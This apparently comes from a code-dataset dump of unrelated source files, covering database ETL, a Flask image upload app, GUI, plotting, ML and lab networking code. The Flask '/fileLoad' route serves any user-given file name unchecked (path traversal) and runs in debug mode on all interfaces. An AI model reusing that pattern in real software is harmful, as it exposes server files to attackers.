('DELETE FROM XREF_COUNTY')\n truncate_xref_state = ('DELETE FROM XREF_STATE')\n truncate_xref_metro = ('DELETE FROM XREF_METRO')\n truncate_xref_cbsa = ('DELETE FROM XREF_CBSA')\n cursor.execute(truncate_xref_county, ())\n cursor.execute(truncate_xref_state, ())\n cursor.execute(truncate_xref_metro, ())\n cursor.execute(truncate_xref_cbsa, ())\n\n conn.commit()\n\n load_xref_county = (\"\"\"\n INSERT INTO XREF_COUNTY(COUNTY_NAME, COUNTY_REGION_ID_ZILLOW, COUNTY_FIPS) \n SELECT DISTINCT COUNTY_NAME, COUNTY_REGION_ID_ZILLOW, COUNTY_FIPS \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_state = (\"\"\"\n INSERT INTO XREF_STATE(STATE_NAME, STATE_FIPS) \n SELECT DISTINCT STATE_NAME, STATE_FIPS \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_metro = (\"\"\"\n INSERT INTO XREF_METRO(METRO_NAME_ZILLOW, 
METRO_REGION_ID_ZILLOW) \n SELECT DISTINCT METRO_NAME_ZILLOW, METRO_REGION_ID_ZILLOW \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_cbsa = (\"\"\"\n INSERT INTO XREF_CBSA(CBSA_NAME, CBSA_CODE, FIPS) \n SELECT DISTINCT CBSA_NAME, CBSA_CODE, FIPS\n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n\n cursor.execute(load_xref_county, ())\n cursor.execute(load_xref_state, ())\n cursor.execute(load_xref_metro, ())\n cursor.execute(load_xref_cbsa, ())\n\n conn.commit()\n cursor.close()\n conn.close()\n\ndef populate_xref_fact_tables():\n conn = mysql.connector.connect(user = database_credentials.user, password = database_credentials.password, database = database_credentials.database)\n cursor = conn.cursor()\n truncate_xref_metro_cbsa = ('DELETE FROM XREF_METRO_CBSA')\n truncate_xref_metro_cbsa_zhvi_oes = ('DELETE FROM XREF_METRO_CBSA_ZHVI_OES')\n\n cursor.execute(truncate_xref_metro_cbsa, ())\n cursor.execute(truncate_xref_metro_cbsa_zhvi_oes, ())\n\n conn.commit()\n\n load_xref_metro_cbsa = (\"\"\"\n INSERT INTO XREF_METRO_CBSA(METRO_FK, CBSA_FK) \n SELECT DISTINCT M.METRO_PK, C.CBSA_PK\n FROM COUNTY_CROSSWALK_STAGING AS S\n INNER JOIN XREF_METRO AS M\n ON S.METRO_NAME_ZILLOW = M.METRO_NAME_ZILLOW \n AND S.METRO_REGION_ID_ZILLOW = M.METRO_REGION_ID_ZILLOW\n INNER JOIN XREF_CBSA AS C\n ON S.CBSA_NAME = C.CBSA_NAME\n AND S.CBSA_CODE = C.CBSA_CODE\n \"\"\")\n\n load_xref_metro_cbsa_zhvi_oes = (\"\"\"\n INSERT INTO XREF_METRO_CBSA_ZHVI_OES(METRO_FK, CBSA_FK, ZHVI_REGION_FK, OES_METRO_AREA_FK) \n SELECT DISTINCT M.METRO_PK, C.CBSA_PK, R.REGION_PK, OM.METRO_AREA_PK\n FROM XREF_METRO_CBSA AS MC \n INNER JOIN XREF_METRO AS M\n ON M.METRO_PK = MC.METRO_FK \n INNER JOIN XREF_CBSA AS C\n ON C.CBSA_PK = MC.CBSA_FK\n INNER JOIN ZHVI_REGION AS R\n ON R.REGION_ID = M.METRO_REGION_ID_ZILLOW \n INNER JOIN OES_METRO_AREA AS OM\n ON OM.AREA_NAME = C.CBSA_NAME\n \"\"\")\n\n cursor.execute(load_xref_metro_cbsa, ())\n cursor.execute(load_xref_metro_cbsa_zhvi_oes, ())\n\n conn.commit()\n cursor.close()\n conn.close()\n\n","sub_path":"transform_xref_data.py","file_name":"transform_xref_data.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303147560","text":"from flask import Flask, render_template, request, send_file\nfrom werkzeug.utils import secure_filename\napp = Flask(__name__)\n\n@app.route('/upload')\ndef render_file():\n return render_template('upload.html')\n\n@app.route('/fileUpload', methods = ['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n result = request.form\n\n f = request.files['file']\n t = result.get('title')\n u = result.get('user')\n o = secure_filename(u + '/'+f.filename)\n f.save('imgs' + '/' + o)\n return o + '의 이름으로 저장되었습니다.'\n\n@app.route('/fileLoad')\ndef get_image():\n filename = request.args.get('name')\n return send_file('imgs/' + filename, mimetype='image/png')\n \n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539114395","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib/python2.5/site-packages/mougeon/gui/hildon/mougeonGui.py\n# Compiled at: 2012-03-13 12:39:51\n\"\"\"\nCreated on 01 March 2012 04:19:29\n\n@author: 
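# Observation on the Flask upload record above, with an illustrative snippet
# (names invented): werkzeug's secure_filename() strips path separators, so
# secure_filename(user + '/' + name) flattens the intended per-user folder
# into a single file name; sanitizing the parts separately keeps the
# hierarchy.
import os
from werkzeug.utils import secure_filename

user, name = 'alice', 'cat.png'
print(secure_filename(user + '/' + name))  # alice_cat.png  (subfolder lost)
print(os.path.join('imgs', secure_filename(user), secure_filename(name)))  # imgs/alice/cat.png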
maemo\n\"\"\"\nimport gtk, hildon, logging, os.path, logging, time, datetime, pango, urllib\nfrom mougeon.gui.gtk.widget import *\nfrom mougeon.gui.hildon.widget import *\nfrom mougeon.gui.gtk.utils import fill_widget_with_logo, LOGO_PIXBUF, ORAGNE_PIXBUF, FREE_PIXBUF\nfrom mougeon.gui.hildon.utils import show_about_dialog, call_handled_method, not_yet_implemented, MougeonStackableWindow, ASYNC_EXCEPTION_HANDLER_INSTANCE, AsyncTask, StopSignalException, show_banner_information, show_note_information\nfrom mougeon.core import facade\nfrom mougeon.core.model import ITrackerListener\nfrom mougeon.common import version\nversion.getInstance().submitRevision('$Revision: 48 $')\nfrom mougeon.gui.hildon.portrait import FremantleRotation\ngtk.gdk.threads_init()\n\ndef show_new_window(window):\n program = hildon.Program.get_instance()\n program.add_window(window)\n window.show_all()\n\n\ndef _show_current_operator_view(facade):\n window = CurrentOperatorView(facade)\n show_new_window(window)\n\n\ndef show_current_operator_view(facade):\n call_handled_method(_show_current_operator_view, facade)\n\n\ndef _show_ratio_operator_view(facade):\n window = RatioView(facade)\n show_new_window(window)\n\n\ndef show_ratio_operator_view(facade):\n call_handled_method(_show_ratio_operator_view, facade)\n\n\nclass mougeonGui(object):\n \"\"\"\n This is the GUI of mougeon\n \"\"\"\n _last_folder = None\n\n def __init__(self):\n \"\"\"\n Create a new application GUI\n \"\"\"\n self.program = hildon.Program.get_instance()\n self.facade = facade.mougeon()\n ASYNC_EXCEPTION_HANDLER_INSTANCE.start_async_exception_handler()\n self.facade.start_tracker_record()\n self.init_main_view()\n\n def init_main_view(self):\n \"\"\"\n create a new window for the main view of the application\n \"\"\"\n window = SplashScreenView(self.facade)\n window.connect('destroy', self.quit_application, None)\n show_new_window(window)\n FremantleRotation('mougeon', main_window=window)\n show_current_operator_view(self.facade)\n return\n\n def quit_application(self, widget, data):\n self.facade.stop_tracker_record()\n ASYNC_EXCEPTION_HANDLER_INSTANCE.stop_async_exception_handler()\n gtk.main_quit()\n\n def run(self):\n gtk.main()\n\n\nclass SplashScreenView(MougeonStackableWindow):\n \"\"\"\n This is the first view of the application e.g. the main view. \n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self)\n\n def init_center_view(self, centerview):\n fill_widget_with_logo(centerview)\n\n def _show_current_op_view(self, widget, data):\n call_handled_method(show_current_operator_view, data)\n\n def _show_ratio_op_view(self, widget, data):\n call_handled_method(show_ratio_operator_view, data)\n\n def _reset_data(self, widget, data):\n call_handled_method(self.reset_data, data)\n\n def reset_data(self, facade):\n message = 'This will remove all tracked cell tower. 
Are you sure?'\n parent = hildon.WindowStack.get_default().peek()\n note = hildon.hildon_note_new_confirmation(parent, message)\n response = gtk.Dialog.run(note)\n note.destroy()\n if response == gtk.RESPONSE_OK:\n facade.reset_data()\n show_banner_information('data cleared')\n\n def init_menu(self, menu):\n currentOpMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n currentOpMenuBtn.set_label('Current')\n currentOpMenuBtn.connect('clicked', self._show_current_op_view, self.facade)\n menu.append(currentOpMenuBtn)\n ratioOpMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n ratioOpMenuBtn.set_label('Ratio')\n ratioOpMenuBtn.connect('clicked', self._show_ratio_op_view, self.facade)\n menu.append(ratioOpMenuBtn)\n resetMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n resetMenuBtn.set_label('Reset...')\n resetMenuBtn.connect('clicked', self._reset_data, self.facade)\n menu.append(resetMenuBtn)\n\n\nclass CurrentOperatorView(MougeonStackableWindow, ITrackerListener):\n \"\"\"\n This view simply shows the currently used operator\n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self, 'Current Operator')\n self.facade.register_tracker_listener(self)\n self.connect('destroy', self._on_destroy_window_event, None)\n return\n\n def _on_destroy_window_event(self, widget, data):\n self.facade.unregister_tracker_listener(self)\n\n def record_operator(self, tracker, tct):\n gtk.gdk.threads_enter()\n call_handled_method(self.refresh_view)\n gtk.gdk.threads_leave()\n logging.debug('Current operator view updated')\n\n def init_menu(self, menu):\n refreshMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n refreshMenuBtn.set_label('Refresh')\n refreshMenuBtn.connect('clicked', self._refresh_view, None)\n menu.append(refreshMenuBtn)\n return\n\n def _refresh_view(self, widget, data):\n call_handled_method(self.refresh_view)\n\n def refresh_view(self):\n for child in self.centerview.get_children():\n logging.debug('removing children from centerview...')\n self.centerview.remove(child)\n\n self.init_center_view(self.centerview)\n self.centerview.show_all()\n\n def init_center_view(self, centerview):\n if self.facade.is_using_freemobile():\n fill_widget_with_logo(centerview, FREE_PIXBUF)\n hildon.hildon_play_system_sound('mouton.wav')\n else:\n fill_widget_with_logo(centerview, ORAGNE_PIXBUF)\n hildon.hildon_play_system_sound('pigeon.wav')\n\n\nclass RatioView(MougeonStackableWindow, ITrackerListener):\n \"\"\"\n This view shows Free and Orange cell tower usage side by side\n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self, 'Ratio')\n self.facade.register_tracker_listener(self)\n self.connect('destroy', self._on_destroy_window_event, None)\n return\n\n def _on_destroy_window_event(self, widget, data):\n self.facade.unregister_tracker_listener(self)\n\n def record_operator(self, tracker, tct):\n gtk.gdk.threads_enter()\n call_handled_method(self.refresh_view)\n gtk.gdk.threads_leave()\n logging.debug('Ratio view updated')\n\n def init_menu(self, menu):\n refreshMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n refreshMenuBtn.set_label('Refresh')\n refreshMenuBtn.connect('clicked', self._refresh_view, None)\n menu.append(refreshMenuBtn)\n return\n\n def _refresh_view(self, widget, data):\n call_handled_method(self.refresh_view)\n\n def refresh_view(self):\n for child in self.centerview.get_children():\n logging.debug('removing children from centerview...')\n self.centerview.remove(child)\n\n 
self.init_center_view(self.centerview)\n self.centerview.show_all()\n\n def init_center_view(self, centerview):\n centerview.pack_start(self.justifyLeft(gtk.Label('Cell Tower ratio:')), expand=False)\n hbox = gtk.HBox()\n hbox.add(FreeThumbnail(self.facade))\n hbox.add(OrangeThumbnail(self.facade))\n centerview.pack_start(hbox)\n message = 'You are mainly using %s' % self.facade.get_mainly_used_operator().name\n centerview.pack_start(gtk.Label(message))","sub_path":"pycfiles/mougeon-0.1.0dev-r48.linux-armv7l.tar/mougeonGui.py","file_name":"mougeonGui.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"608192477","text":"from pylab import *\n\nparams = { 'backend' : 'ps',\n 'legend.fontsize': 25,\n 'axes.labelsize': 25,\n 'legend.fontsize': 25,\n 'text.fontsize': 25,\n 'font.size': 25,\n 'xtick.labelsize': 25,\n 'ytick.labelsize': 25}\nrcParams.update(params)\n\nbcc=loadtxt(\"bcc/cohesive.dat\")\nfcc=loadtxt(\"fcc/cohesive.dat\")\ndia=loadtxt(\"diamond/cohesive.dat\")\nbcc_fit=loadtxt(\"bcc/fit.dat\")\nfcc_fit=loadtxt(\"fcc/fit.dat\")\ndia_fit=loadtxt(\"diamond/fit.dat\")\ntang=loadtxt(\"common_tangent.dat\")\n\nfig=figure(0,(12,10))\nax=fig.add_subplot(111)\nax.plot(bcc[:,0],bcc[:,1],'ro',ms=8)\nax.plot(fcc[:,0],fcc[:,1],'bo',ms=8)\nax.plot(dia[:,0],dia[:,1],'go',ms=8)\nax.plot(bcc_fit[:,0],bcc_fit[:,1],'r-',lw=2,label='bcc')\nax.plot(fcc_fit[:,0],fcc_fit[:,1],'b-',lw=2,label='fcc')\nax.plot(dia_fit[:,0],dia_fit[:,1],'g-',lw=2,label='diamond')\nax.plot(tang[:,0],tang[:,1],'kx-',ms=15,lw=3)\nax.plot([tang[0,0],tang[0,0]],tang[:,1],'k-',lw=1)\nax.plot(tang[:,0],[tang[-1,1],tang[-1,1]],'k-',lw=1)\nax.text(11.4,-5,'dE')\nax.text(14.8,-5.25,'dV')\nax.set_ylabel('Cohesive energy [eV]')\nax.set_xlabel('Volume [$\\mathrm{\\AA}^3$]')\nax.legend()\nfig.savefig('Maxwell_construction.pdf')\nfig.show()","sub_path":"tutroial/periodic_systems/reference/problem_3/plot_tangent.py","file_name":"plot_tangent.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121891782","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport re\n# %%\n_, __, files = next(os.walk('data'))\ncols=['Sample','Orientation','Run','Filetype']\nnamedf = pd.DataFrame(columns=cols)\nfiles = list(filter(lambda s: s.endswith('csv'),files))\nfindletters = re.compile('[a-zA-Z]+')\nfinddigits = re.compile('\\d+')\n# %%\nfor filename in files:\n pieces = filename.split('.')\n dline = {}\n # collect 'c' or 'x' character from end of last piece before extension\n dline['Filetype'] = pieces[-2][-1]\n stems = pieces[0].split('-')\n dline['Sample'] = findletters.findall(stems[0])[0]\n dline['Orientation'] = finddigits.findall(stems[0])[0]\n prelength = len(dline['Sample'])+len(dline['Orientation'])\n dline['Run'] = stems[0][prelength:]\n newline = pd.DataFrame(dline,columns=cols,index=[0])\n namedf = namedf.append(newline,ignore_index=True)\n# %%\nnamedf.sort_values(cols,ascending=[True,False,True,True],inplace=True)\ndef namegrab(text1,text2,text3,df,filelist):\n \"\"\"Finds the filename in a list that matches text1 and text2\n in columns 1-3 of the dataframe and has the lower value\n for column 4 because we trust csvs more than workbooks.\"\"\"\n text4 = 
df[(df.iloc[:,0]==text1)&(df.iloc[:,1]==text2)&(df.iloc[:,2]==text3)].iloc[:,3].min()\n for name in filelist:\n if (text1 in name)&(str(text2) in name)&(str(text3) in name)&(text4 in name):\n return name\n return None\n# %%\nplotdict = {}\nsamples = namedf['Sample'].unique()\nfor sample in samples:\n plotdict[sample]={}\n or_list = list(namedf[namedf['Sample']==sample].Orientation.unique())\n for orient in or_list:\n plotdict[sample][orient]={}\n run_list = list(namedf[(namedf['Sample']==sample)&\n (namedf['Orientation']==orient)].Run.unique())\n for run in run_list:\n plotdict[sample][orient][run]=namegrab(sample,orient,run,namedf,files)\n# %%\nfor sample in plotdict:\n orients = list(plotdict[sample].keys())\n if '100' in orients:\n orients.remove('100')\n for run in plotdict[sample]['100'].keys():\n df100 = pd.read_csv('data/'+plotdict[sample]['100'][run])\n plt.plot(df100.iloc[:,1],df100['Alpha'],lw=2,c='r',label='100 '+run)\n if '010' in orients:\n orients.remove('010')\n for run in plotdict[sample]['010'].keys():\n df010 = pd.read_csv('data/'+plotdict[sample]['010'][run])\n plt.plot(df010.iloc[:,1],df010['Alpha'],lw=2,c='g',label='010 '+run)\n if '001' in orients:\n orients.remove('001')\n for run in plotdict[sample]['001'].keys():\n df001 = pd.read_csv('data/'+plotdict[sample]['001'][run])\n plt.plot(df001.iloc[:,1],df001['Alpha'],lw=2,c='b',label='001 '+run)\n if len(orients) > 0:\n for orient in orients:\n for run in plotdict[sample][orient].keys():\n df000 = pd.read_csv('data/'+plotdict[sample][orient][run])\n plt.plot(df000.iloc[:,1],df000['Alpha'],lw=2,c='black',label=orient+' '+run)\n plt.title(sample)\n plt.xlabel('Temp (Celsius)')\n plt.ylabel('Linear Thermal Exp.')\n plt.legend()\n plt.savefig('testplots/'+sample+'.tif')\n plt.show()\n plt.clf()","sub_path":"plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"534184174","text":"from allauth.account.utils import user_username, user_email, user_field\nfrom allauth.socialaccount.adapter import DefaultSocialAccountAdapter\nfrom allauth.utils import valid_email_or_none\n\n\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n # def save_user(self, request, sociallogin, form=None):\n# #\n# # user = super(SocialAccountAdapter, self).save_user(request, sociallogin, form)\n# #\n# # social_app_name = sociallogin.account.provider.upper()\n# # # extra_data = user.extra_data()\n# #\n# # if social_app_name == \"GOOGLE\":\n# # User.objects.get_or_create_google_user(user_pk=user.pk, extra_data = extra_data) #extra_data\n# #\n# # elif social_app_name == \"KAKAO\":\n# # User.objects.get_or_create_kakao_user(user_pk=user.pk, extra_data = extra_data)\n def populate_user(self,\n request,\n sociallogin,\n data):\n social_app_name = sociallogin.account.provider.upper()\n username = None # default so providers other than Google do not raise NameError below\n if social_app_name == \"GOOGLE\":\n username = data.get('last_name') + data.get('first_name')\n\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n name = data.get('name')\n user = sociallogin.user\n user_username(user, username or '')\n user_email(user, valid_email_or_none(email) or '')\n name_parts = (name or '').partition(' ')\n user_field(user, 'first_name', first_name or name_parts[0])\n user_field(user, 'last_name', last_name or name_parts[2])\n return 
user","sub_path":"adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307796705","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport model\n\nmodel_dir = './lenet-5/'\nmnist = input_data.read_data_sets(\"mnist_data\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\ny_ = tf.placeholder(tf.float32, [None, 10])\nimage = tf.reshape(x, [-1, 28, 28, 1])\nkeep_prob = tf.placeholder(tf.float32)\ny, intermediate, conv1, conv2 = model.lenet_5(image, keep_prob)\npredicted = tf.argmax(y, 1)\nlabel = tf.argmax(y_, 1)\ncorrect = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n\nsaver = tf.train.Saver()\ninit = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\nconfig = tf.ConfigProto(allow_soft_placement=True)\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint(model_dir))\n print('restore succeed.')\n\n samples = []\n neg_samples = []\n # pred = []\n ground = []\n neg_predict = []\n neg_ground = []\n c1 = []\n c2 = []\n equal = 0\n flag = True\n stat = np.zeros(10)\n for i in range(55000):\n images = mnist.train.images[i:i+1, :]\n labels = mnist.train.labels[i:i+1, :]\n feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n intermediateValues, predictedNp, labelNp, weight_fc2 = sess.run([intermediate, predicted, label, conv1], feed_dict=feed_dict)\n # stat[labelNp[0]] += 1\n if predictedNp == labelNp:\n equal += 1\n samples.extend(intermediateValues)\n ground.extend(labelNp)\n # if flag:\n c1.extend(weight_fc2)\n # c2.extend(weight_fc3)\n # flag = False\n else:\n neg_samples.extend(intermediateValues)\n neg_predict.extend(predictedNp)\n neg_ground.extend(labelNp)\n\n # for i in range(5000):\n # images = mnist.validation.images[i:i + 1, :]\n # labels = mnist.validation.labels[i:i + 1, :]\n # feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n # intermediateValues, predictedNp, labelNp, weight_fc2 = sess.run([intermediate, predicted, label, conv1], feed_dict=feed_dict)\n # # stat[labelNp[0]] += 1\n # if predictedNp == labelNp:\n # equal += 1\n # samples.extend(intermediateValues)\n # ground.extend(labelNp)\n # # if flag:\n # c1.extend(weight_fc2)\n # # c2.extend(weight_fc3)\n # # flag = False\n # else:\n # neg_samples.extend(intermediateValues)\n # neg_predict.extend(predictedNp)\n # neg_ground.extend(labelNp)\n\n samples = np.array(samples)\n ground = np.array(ground)\n neg_samples = np.array(neg_samples)\n neg_predict = np.array(neg_predict)\n neg_ground = np.array(neg_ground)\n print(equal)\n print(samples.shape, ground.shape)\n # print(stat)\n np.save('training_set_neuron_outputs', samples)\n np.save('training_set_labels', ground)\n np.save('training_set_error_outputs', neg_samples)\n np.save('training_set_error_predicts', neg_predict)\n np.save('training_set_error_labels', neg_ground)\n np.save('conv1', c1)\n # np.save('conv2', c2)\n\n samples_test = []\n pred_test = []\n label_test = []\n equal = 0\n none = 0\n for i in range(10000):\n images = mnist.test.images[i:i+1, :]\n labels = mnist.test.labels[i:i+1, :]\n feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n intermediateValues, predictedNp, labelNp, = sess.run([intermediate, predicted, label], feed_dict=feed_dict)\n if predictedNp == 
labelNp:\n equal += 1\n else:\n none += 1\n samples_test.extend(intermediateValues)\n pred_test.extend(predictedNp)\n label_test.extend(labelNp)\n samples_test = np.array(samples_test)\n pred_test = np.array(pred_test)\n label_test = np.array(label_test)\n\n print(equal, none)\n print(samples_test.shape, pred_test.shape, label_test.shape)\n np.save('test_set_neuron_outputs', samples_test)\n np.save('test_set_predictions', pred_test)\n np.save('test_set_labels', label_test)\n\n color = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22',\n '#17becf']\n pca = TSNE(n_components=2)\n samples_reduction = pca.fit_transform(samples)\n plt.figure(1)\n for i in range(10):\n print(samples_reduction[ground == i, 0].shape)\n plt.scatter(samples_reduction[ground == i, 0], samples_reduction[ground == i, 1], c=color[i], marker='o', s=2, linewidths=0, alpha=0.8, label='%s' % i)\n plt.show()\n","sub_path":"compute_intervalues.py","file_name":"compute_intervalues.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142432712","text":"import numpy as np\r\n\r\nimport types\r\n\r\ndef is_prime(n):\r\n \"\"\"simple function to check if a given integer is prime\"\"\"\r\n # no change necessary here\r\n\r\n if n <= 1:\r\n return False\r\n\r\n if n > 2 and n % 2 == 0:\r\n return False\r\n\r\n for i in range(3, int(np.sqrt(n)) + 1, 2):\r\n if n % i == 0:\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef pretty_print_bool_array(array):\r\n \"\"\"this function will print a boolean array such that True values are 'x'\r\n and False values are '.'\"\"\"\r\n\r\n with np.printoptions(formatter={\"bool\": lambda b: \"x\" if b else \".\"}):\r\n print(array)\r\n\r\n\r\ndef imports_of_your_file(filename, testfile):\r\n \"\"\" Yields all imports in the testfile. \"\"\"\r\n\r\n for name, val in vars(testfile).items():\r\n if isinstance(val, types.ModuleType):\r\n # get direct imports\r\n yield val.__name__\r\n\r\n else:\r\n # get from x import y imports\r\n imprt = getattr(testfile, name)\r\n\r\n if hasattr(imprt, \"__module__\") and not str(imprt.__module__).startswith(\"_\") and not str(imprt.__module__) == filename:\r\n yield imprt.__module__\r\n\r\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"109456656","text":"N, Y = map(int, input().split())\nflag = False\n\nfor i in range(0, N+1): # 10000\n for j in range(0, N+1-i): # 5000\n if 10000*i + 5000*j + 1000*(N-i-j) == Y:\n print(i, j, N-i-j)\n flag = True\n break\n if flag:\n break\nelse:\n if not flag:\n print(\"-1 -1 -1\")\n","sub_path":"Day1/ABC_085C.py","file_name":"ABC_085C.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551412537","text":"from . 
import *\nfrom sqlalchemy.sql import exists\nimport json\nimport os\n\n\ndef _func(path):\n print(path)\n with open(path) as f:\n accounts = json.load(f)\n for account in accounts:\n if db.session.query(exists().where(\n OfficialAccount.accountname==account['accountname']\n )).scalar():\n print(\"official account %s already exits\" % account['accountname'])\n continue\n a = OfficialAccount(accountname=account['accountname'],\n avatar=account['avatar'], description=account['description'],\n page_url=account['page_url'])\n db.session.add(a)\n print(\"create official account %s\" % account['accountname'])\n db.session.commit()\n print(\"generate offical account success\")\n\ndef generate_official_accounts():\n print('generating official accounts...')\n paths = [\n 'scripts/sync_buaa_art_news_accounts.json',\n 'scripts/sync_buaa_news_accounts.json',\n 'scripts/sync_weibo_accounts.json',\n 'scripts/sync_weixin_accounts.json',\n ]\n for p in paths:\n _func(p)\n\n","sub_path":"scripts/generate_official_accounts.py","file_name":"generate_official_accounts.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123660637","text":"#\n# Copyright 2020 University of Toronto\n#\n# Permission is hereby granted, to use this software and associated\n# documentation files (the \"Software\") in course work at the University\n# of Toronto, or for personal use. Other uses are prohibited, in\n# particular the distribution of the Software either publicly or to third\n# parties.\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport socket\nimport datetime\nimport select\nfrom ece361.lab2.frame import Frame\n\n\nserver_address = ('192.168.1.1', 10000)\nsend_queue = []\n\nfor i in range(10):\n # create a new Frame with sequence number i, a message and 1 second ack timeout\n new_frame = Frame(seqnum=i,\n data=('This is message # ' + str(i)).encode('ascii'),\n destination=server_address,\n timeout=1)\n send_queue.append(new_frame)\n\nt_start = datetime.datetime.now()\n\n# send all frames at once\nfor frame in send_queue:\n frame.send()\n\nframe_timedout = 0\nframe_delivered = 0\n\n# repeat until all frames either receive a response or time out\nwhile send_queue != []:\n # will block until at least one frame receives some feedback (ACK/NACK, timed out etc.)\n Frame.wait_for_multiple_ack_nacks(send_queue)\n\n # at least one frame receives feedback, go through the send queue\n # we have to go through the queue in reverse because we are removing elements from the queue in the loop\n # if you don't believe that try write the loop the other way and you will see problems\n for i in range(len(send_queue) - 1, -1, -1):\n if (send_queue[i].status() == Frame.Status.ack_nacked):\n # frame received by the other side\n frame_delivered += 1\n # retrieve the acknowledgement frame, which is a frame with only sequence number and no data\n ack_frame = send_queue[i].retrieve_ack_nack()\n # print the original message, the ACK/NACK and the RTT\n print(send_queue[i].data,\n 'DELIVERED. ACK:', ack_frame.seqnum,\n 'RTT:', send_queue[i].socket.t_ack - send_queue[i].socket.t_send)\n\n # remove frame from send queue\n send_queue.remove(send_queue[i])\n elif (send_queue[i].status() == Frame.Status.timedout):\n # timedout\n frame_timedout += 1\n print(send_queue[i].data, 'TIMED OUT.')\n\n # remove frame from send queue\n send_queue.remove(send_queue[i])\n else:\n # frame is still in flight. 
do nothing.\n pass\n\nt_finish = datetime.datetime.now()\n\nprint(\"Frames delivered:\", frame_delivered)\nprint(\"Frames timed out:\", frame_timedout)\nprint(\"Total transmission time:\", t_finish - t_start)\n","sub_path":"lab2/example/client_improved.py","file_name":"client_improved.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359299993","text":"\"\"\"\n\n _models.py\n\nModel definitions to use for building feature extractors\n\"\"\"\nimport tensorflow as tf\n\n_alex_layers = [\n (96, 11, 4),\n \"M\",\n (256, 5, 1),\n \"M\",\n (384, 3, 1),\n (384, 3, 1),\n (256, 3, 1),\n \"M\"\n ]\n\ndef BNAlexNetFCN(num_channels=3):\n \"\"\"\n Like the conv layers of AlexNet, using Batch Norm instead of LRN.\n \n :num_channels: number of channels for input image.\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n for l in _alex_layers:\n if l == \"M\":\n net = tf.keras.layers.MaxPool2D(3,2)(net)\n else:\n k, 